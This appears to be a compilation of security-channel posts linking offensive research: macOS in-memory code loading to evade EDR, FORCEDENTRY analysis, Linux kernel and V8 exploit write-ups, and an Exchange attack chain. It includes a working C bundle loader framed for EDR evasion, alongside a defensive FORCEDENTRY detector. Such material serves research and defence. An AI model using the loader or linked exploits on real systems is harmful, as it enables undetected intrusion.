💥In-Memory Execution in macOS: the Old and the New
As part of our work, it’s often interesting to try to find possible avenues of attack that bypass detections on EDR products. On macOS, EDR products specifically collect telemetry from fork and exec syscalls. macOS has alternative ways of executing code, which side-step these system calls by executing code directly in-memory.
In this writeup, we touch on all 3 aforementioned APIs and then create a PoC loader which uses NSCreateObjectFileImageFromFile and CFBundleCreate to load a bundle from disk and execute it.
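As an added example (not the article's PoC and not code from the page), here are the two load paths the summary names, in C: the legacy NSObjectFileImage/NSModule API (NSCreateObjectFileImageFromFile, NSLinkModule, NSLookupSymbolInModule) and CFBundle (CFBundleCreate, CFBundleLoadExecutable, CFBundleGetFunctionPointerForName). Neither path issues a fork or exec, which is the point: the host process simply maps and links the bundle, so an EDR keyed only on those syscalls sees nothing. Caveat for defenders: both still open the file from disk, so file-open and mmap telemetry (EndpointSecurity's ES_EVENT_TYPE_NOTIFY_OPEN and ES_EVENT_TYPE_NOTIFY_MMAP) remains visible; NSCreateObjectFileImageFromMemory takes a buffer instead of a path, but this example sticks to the file-backed calls the summary names. The symbol name `entry`, the bundle paths and the `LOADER_*` result codes are assumptions of this example. The Mach-O magic check is portable; the loader bodies compile only on macOS and report LOADER_UNSUPPORTED elsewhere. Build on macOS with `clang loader.c -framework CoreFoundation`; the bundle must be linked with `-bundle`, and for the CFBundle path it must sit in a `.bundle` directory.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Result codes are an assumption of this example, not an Apple API. */
enum { LOADER_OK = 0, LOADER_NOFILE = 1, LOADER_LINK = 2, LOADER_NOSYM = 3,
       LOADER_UNSUPPORTED = 100 };

/* Mach-O magic values, spelled out so this check compiles on any platform.
 * Thin images are stored in host (little-endian) order, fat headers big-endian. */
#define MACHO_MAGIC32 0xfeedfaceu
#define MACHO_MAGIC64 0xfeedfacfu
#define MACHO_FAT     0xcafebabeu

/* Cheap pre-check before handing a file to a loader: does it look like Mach-O? */
int has_macho_magic(const uint8_t *buf, size_t len)
{
    if (len < 4) return 0;
    uint32_t le = (uint32_t)buf[0] | (uint32_t)buf[1] << 8 | (uint32_t)buf[2] << 16 | (uint32_t)buf[3] << 24;
    uint32_t be = (uint32_t)buf[3] | (uint32_t)buf[2] << 8 | (uint32_t)buf[1] << 16 | (uint32_t)buf[0] << 24;
    return le == MACHO_MAGIC32 || le == MACHO_MAGIC64 || be == MACHO_FAT;
}

#ifdef __APPLE__
#include <mach-o/dyld.h>
#include <CoreFoundation/CoreFoundation.h>

/* "Old" path: NSObjectFileImage/NSModule (deprecated since 10.5, still exported).
 * Links the bundle privately into this process and calls a C function in it.
 * NSLookupSymbolInModule wants the assembler name, hence the leading '_'. */
int run_via_dyld_api(const char *path, const char *symbol)
{
    NSObjectFileImage img;
    if (NSCreateObjectFileImageFromFile(path, &img) != NSObjectFileImageSuccess)
        return LOADER_NOFILE;
    NSModule mod = NSLinkModule(img, path,
                                NSLINKMODULE_OPTION_PRIVATE | NSLINKMODULE_OPTION_RETURN_ON_ERROR);
    if (!mod) { NSDestroyObjectFileImage(img); return LOADER_LINK; }
    char mangled[256];
    snprintf(mangled, sizeof mangled, "_%s", symbol);
    NSSymbol sym = NSLookupSymbolInModule(mod, mangled);
    if (!sym) {
        NSUnLinkModule(mod, NSUNLINKMODULE_OPTION_NONE);
        NSDestroyObjectFileImage(img);
        return LOADER_NOSYM;
    }
    void (*fn)(void) = (void (*)(void))NSAddressOfSymbol(sym);
    fn();                                   /* no fork/exec happened anywhere above */
    NSUnLinkModule(mod, NSUNLINKMODULE_OPTION_NONE);
    NSDestroyObjectFileImage(img);
    return LOADER_OK;
}

/* "New" path: CFBundle. `path` is a bundle directory (Foo.bundle), not a bare
 * Mach-O; CFBundleLoadExecutable maps Foo.bundle/Contents/MacOS/Foo. */
int run_via_cfbundle(const char *path, const char *symbol)
{
    CFURLRef url = CFURLCreateFromFileSystemRepresentation(kCFAllocatorDefault,
                        (const UInt8 *)path, (CFIndex)strlen(path), true);
    if (!url) return LOADER_NOFILE;
    CFBundleRef bundle = CFBundleCreate(kCFAllocatorDefault, url);
    CFRelease(url);
    if (!bundle) return LOADER_NOFILE;
    if (!CFBundleLoadExecutable(bundle)) { CFRelease(bundle); return LOADER_LINK; }
    CFStringRef name = CFStringCreateWithCString(kCFAllocatorDefault, symbol, kCFStringEncodingUTF8);
    void (*fn)(void) = (void (*)(void))CFBundleGetFunctionPointerForName(bundle, name);
    CFRelease(name);
    if (!fn) { CFBundleUnloadExecutable(bundle); CFRelease(bundle); return LOADER_NOSYM; }
    fn();
    CFBundleUnloadExecutable(bundle);
    CFRelease(bundle);
    return LOADER_OK;
}
#else
/* Non-Apple platforms: keep the file compiling, report that the technique is N/A. */
int run_via_dyld_api(const char *path, const char *symbol)
{ (void)path; (void)symbol; return LOADER_UNSUPPORTED; }
int run_via_cfbundle(const char *path, const char *symbol)
{ (void)path; (void)symbol; return LOADER_UNSUPPORTED; }
#endif

int main(int argc, char **argv)
{
    if (argc < 3) { fprintf(stderr, "usage: %s <bundle-path> <symbol> [cf]\n", argv[0]); return 2; }
    int rc = argc > 3 ? run_via_cfbundle(argv[1], argv[2]) : run_via_dyld_api(argv[1], argv[2]);
    printf("loader returned %d\n", rc);
    return rc;
}
```

Usage: `./loader ./payload.bundle entry` for the dyld path, `./loader ./Payload.bundle entry cf` for the CFBundle path. The private link option keeps the bundle's symbols out of the global namespace, so a second load of the same image does not collide with the first.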
|FORCEDENTRY, ты тут?|
🕵️♂️I think many still remember FORCEDENTRY, the data-only 0-click RCE exploit from NSO Group that made so much noise a year ago (CVE-2021-30860: an integer overflow in Apple's xpdf-derived JBIG2 implementation, in JBIG2Stream::readTextRegionSeg(), exploited by programming a JBIG2 "weird machine" inside the parser; the code effectively belongs to CoreGraphics), delivered over iMessage. In short, you receive a PDF file posing as a ".gif", and because IMTranscoderAgent handled exactly that kind of impostor outside the BlastDoor sandbox, NSO could achieve a sandbox escape (SBX). In reality the exploitation was far more involved; read more: on the channel, here and here.
Moreover, the Google Project Zero researchers could not establish the exact trail after the IMTranscoderAgent sandbox escape and proposed several exploitation scenarios as hypotheses:
1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE
2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPE
The problem for defenders, to this day, is that there are still no public samples, so sample-based (signature) detection is off the table. Besides the attack analysis, Matt's post discusses detection that relies neither on regular expressions nor on process-name checks, and it ends with a tool (ELEGANTBOUNCER) that analyzes files from such non-fileless (data-only) attacks without relying on samples.
🔖More detail in Matt Suiche's article.
#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #security #exploitation #sbx #xpdf #weirdMachine #JBIG2
Magnet Forensics
FORCEDENTRY: Detecting the Exploit With No Samples
This is a deep dive into the CVE-2021-30860 vulnerability, also known as FORCEDENTRY, and how to detect it with root cause analysis.
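The "detect the root cause, not the sample" idea above, as an added example in C (not code from the page and not ELEGANTBOUNCER's implementation). Two checks are shown: the delivery shape (a file named .gif whose bytes start with the PDF magic, the impostor IMTranscoderAgent handled outside BlastDoor) and the precondition of the bug itself. JBIG2Stream::readTextRegionSeg() sums the symbol counts of every symbol dictionary a text region refers to into a 32-bit integer and sizes an allocation from it; if that sum wraps, the allocation is too small. The example parses a short-form JBIG2 segment header (spec section 7.2, the embedded profile PDF uses), resolves the referred-to dictionaries and redoes the sum with overflow checking. The dictionary table and the header bytes are constructed for this example; a real scanner would extract JBIG2Decode streams from the PDF and read each dictionary's SDNUMEXSYMS field rather than take a table as input, and would also handle the long-form header (seven or more references), which this example rejects.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Check 1: delivery shape. Name says GIF, bytes say PDF. */
bool pdf_disguised_as_gif(const char *name, const uint8_t *data, size_t len)
{
    size_t n = strlen(name);
    bool claims_gif = n >= 4 && strcasecmp(name + n - 4, ".gif") == 0;
    bool is_pdf = len >= 5 && memcmp(data, "%PDF-", 5) == 0;
    return claims_gif && is_pdf;
}

/* Check 2: root cause. Constructed stand-in for the symbol dictionaries a scanner
 * would have parsed earlier: segment number -> SDNUMEXSYMS (exported symbols). */
typedef struct { uint32_t number; uint32_t num_ex_syms; } dict_entry;

static uint32_t be32(const uint8_t *p)
{ return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3]; }

/* Short-form JBIG2 segment header. Returns bytes consumed, or 0 on malformed
 * input or the long-form layout (>= 7 references), which is not handled here. */
size_t parse_segment_header(const uint8_t *p, size_t len, uint8_t *type,
                            uint32_t refs[6], size_t *nrefs)
{
    if (len < 6) return 0;
    uint32_t segnum = be32(p);
    uint8_t flags = p[4];
    size_t page_size = (flags & 0x40) ? 4 : 1;   /* bit 6: page association is 4 bytes */
    size_t count = p[5] >> 5;                    /* top 3 bits: referred-to segment count */
    if (count == 7) return 0;
    size_t ref_size = segnum <= 256 ? 1 : segnum <= 65536 ? 2 : 4;
    size_t need = 6 + count * ref_size + page_size + 4;   /* + 4-byte data length */
    if (len < need) return 0;
    const uint8_t *q = p + 6;
    for (size_t i = 0; i < count; i++) {
        uint32_t r = 0;
        for (size_t b = 0; b < ref_size; b++) r = r << 8 | *q++;
        refs[i] = r;
    }
    *type = flags & 0x3f;                        /* bits 0-5: segment type */
    *nrefs = count;
    return need;
}

/* True with the checked total if the referenced symbols fit in 32 bits; false if
 * the header is not a text region (types 4, 6, 7) or the sum wraps, which is the
 * condition the FORCEDENTRY overflow needs. Unresolved references count as 0. */
bool text_region_symbol_total(const uint8_t *hdr, size_t len,
                              const dict_entry *dicts, size_t ndicts, uint32_t *total)
{
    uint8_t type; uint32_t refs[6]; size_t nrefs;
    if (!parse_segment_header(hdr, len, &type, refs, &nrefs)) return false;
    if (type != 4 && type != 6 && type != 7) return false;
    uint32_t acc = 0;
    for (size_t i = 0; i < nrefs; i++)
        for (size_t d = 0; d < ndicts; d++)
            if (dicts[d].number == refs[i] &&
                __builtin_add_overflow(acc, dicts[d].num_ex_syms, &acc))
                return false;
    *total = acc;
    return true;
}

/* The same sum with the unchecked arithmetic the vulnerable code used: the
 * (wrapped) count that would have sized the symbol array. */
uint32_t wrapped_symbol_total(const uint8_t *hdr, size_t len,
                              const dict_entry *dicts, size_t ndicts)
{
    uint8_t type; uint32_t refs[6]; size_t nrefs;
    if (!parse_segment_header(hdr, len, &type, refs, &nrefs)) return 0;
    uint32_t acc = 0;
    for (size_t i = 0; i < nrefs; i++)
        for (size_t d = 0; d < ndicts; d++)
            if (dicts[d].number == refs[i]) acc += dicts[d].num_ex_syms;
    return acc;
}

/* Constructed sample: segment 5, immediate text region, referring to dicts 1-3. */
static const uint8_t sample_hdr[] = {
    0x00, 0x00, 0x00, 0x05,   /* segment number 5 (so 1-byte references) */
    0x06,                     /* flags: type 6, 1-byte page association */
    0x60,                     /* referred-to count 3 (0b011 << 5) */
    0x01, 0x02, 0x03,         /* referred-to segments */
    0x01,                     /* page association */
    0x00, 0x00, 0x00, 0x00    /* data length (unused here) */
};
static const dict_entry sample_dicts[] = { {1, 0x80000000u}, {2, 0x80000000u}, {3, 0x10u} };

int main(void)
{
    static const uint8_t pdf_bytes[] = "%PDF-1.7\n";
    printf("fake gif: %s\n", pdf_disguised_as_gif("cat.GIF", pdf_bytes, sizeof pdf_bytes) ? "yes" : "no");
    uint32_t total = 0;
    bool fits = text_region_symbol_total(sample_hdr, sizeof sample_hdr, sample_dicts, 3, &total);
    printf("checked sum %s; unchecked code would allocate for %u symbols\n",
           fits ? "fits" : "WRAPS", wrapped_symbol_total(sample_hdr, sizeof sample_hdr, sample_dicts, 3));
    return 0;
}
```

Two dictionaries of 2^31 symbols plus one of 16 wrap the 32-bit sum to 16, so the vulnerable allocation would hold 16 pointers while the copy loop writes 2^32+16 of them; flagging the wrap is a verdict about the file's structure, not about any particular sample's bytes.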
🔥Deconstructing and Exploiting CVE-2020-6418 (exploit attached: CVE-2020-6418-exploit.js)
This vulnerability lies in V8, Google Chrome's JavaScript engine, and specifically in its optimizing compiler TurboFan; Chrome versions prior to 80.0.3987.122 are affected. In this article, Daniel Toh Jing En gives a step-by-step analysis of the vulnerability, from root cause to exploitation.
|CVE-2022-2602 Kernel Exploit| (exploit attached: exploit.c)
🔥The vulnerability is a UAF affecting the registered-file-descriptor functionality of the io_uring subsystem. A file can be registered in an io_uring context, freed by the Unix garbage collector (GC), and then reused by a requested io_uring operation (for example a writev). Exploiting the bug was a matter of replacing the freed file structure with a read-only file (e.g. /etc/passwd) so that the pending write lands in it, and of winning a race with a small window.
🔥CVE-2022-2602 exploit using the userfaultfd technique (attached: poc_userfaultfd.c)
🔥CVE-2022-2602 exploit using the inode-locking technique (attached: poc_inode_locking.c)
📕DirtyCred: Escalating Privilege in Linux Kernel
🔖Blog posts:
DirtyCred Remastered: how to turn an UAF into Privilege Escalation
CVE-2022-2602: DirtyCred File Exploitation applied on an io_uring UAF
💥Home Grown Red Team: Let’s Make Some Malware In C:
Part 3
This post is all about the DLL!
💥OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations
CrowdStrike recently discovered a new exploit method (called OWASSRF) that chains CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access (OWA). It bypasses the URL rewrite mitigations for the Autodiscover endpoint that Microsoft provided in response to ProxyNotShell, because the requests go through the OWA front end rather than Autodiscover; the rewrite rule is a workaround, not a fix, and the November 2022 Exchange Security Update (KB5019758) is what actually patches both CVEs.
After initial access via this method, the threat actor leveraged legitimate Plink and AnyDesk executables to maintain access and applied anti-forensics techniques on the Microsoft Exchange server to hide their activity.
#Analytics
Top 10 most exploited vulnerabilities in 2022
1. CVE-2022-30190: MS Office "Follina"
2. CVE-2021-44228: Apache Log4Shell
3. CVE-2022-22965: Spring4Shell
4. CVE-2022-1388: F5 BIG-IP
5. CVE-2022-0609: Google Chrome zero-day
https://blog.google/threat-analysis-group/countering-threats-north-korea
6. CVE-2017-11882: Old but not forgotten: the MS Office Equation Editor bug
7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell
8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs
9. CVE-2022-26134: Atlassian Confluence RCE flaw
10. CVE-2022-30525: Zyxel RCE vulnerability
Google
Countering threats from North Korea
On February 10, Threat Analysis Group discovered two distinct North Korean government-backed attacker groups exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609.
#Blue_Team_Techniques
Incident Response Methodologies 2022
https://github.com/certsocietegenerale/IRM
// EN/ES/FR/RU Versions
#Offensive_security
MSI Shenanigans: Offensive Capabilities Overview
https://mgeeky.tech/msi-shenanigans-part-1
]-> Tool that analyzes malicious MSI installation packages, extracts files, streams and binary data, and incorporates a YARA scanner:
https://github.com/mgeeky/msidump
]-> PoC code and samples presenting the emerging threat of MSI installer files:
https://github.com/mgeeky/msi-shenanigans
#Threat_Research
#Cloud_Security
1. Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg
https://blog.exodusintel.com/2022/12/19/linux-kernel-exploiting-a-netfilter-use-after-free-in-kmalloc-cg
2. Elastic IP Hijacking - A New Attack Vector in AWS
https://www.mitiga.io/blog/elastic-ip-hijacking-a-new-attack-vector-in-aws
Exodus Intelligence
Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg - Exodus Intelligence
By Sergi Martinez. Overview: It's been a while since our last technical blog post, so here's one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache…
#exploit
1. CVE-2022-47518, CVE-2022-47519, CVE-2022-47520, CVE-2022-47521:
Remote DoS in Linux kernel WILC1000 wireless driver
https://securitylab.github.com/advisories/GHSL-2022-112_GHSL-2022-115_wilc1000
2. CVE-2022-2602:
io_uring kernel exploit
https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit
3. Directory Traversal Vulnerability in Huawei HG255s Products
https://infosecwriteups.com/directory-ttraversal-vulnerability-in-huawei-hg255s-products-dce941a1d015
GitHub Security Lab
GHSL-2022-112_GHSL-2022-115: Remote denial of service in Linux kernel WILC1000 wireless driver - CVE-2022-47518, CVE-2022-47519…
Multiple vulnerabilities in the Linux kernel Microchip WILC1000 802.11 wireless driver can allow remote and local attackers to trigger a denial of service when parsing management frames.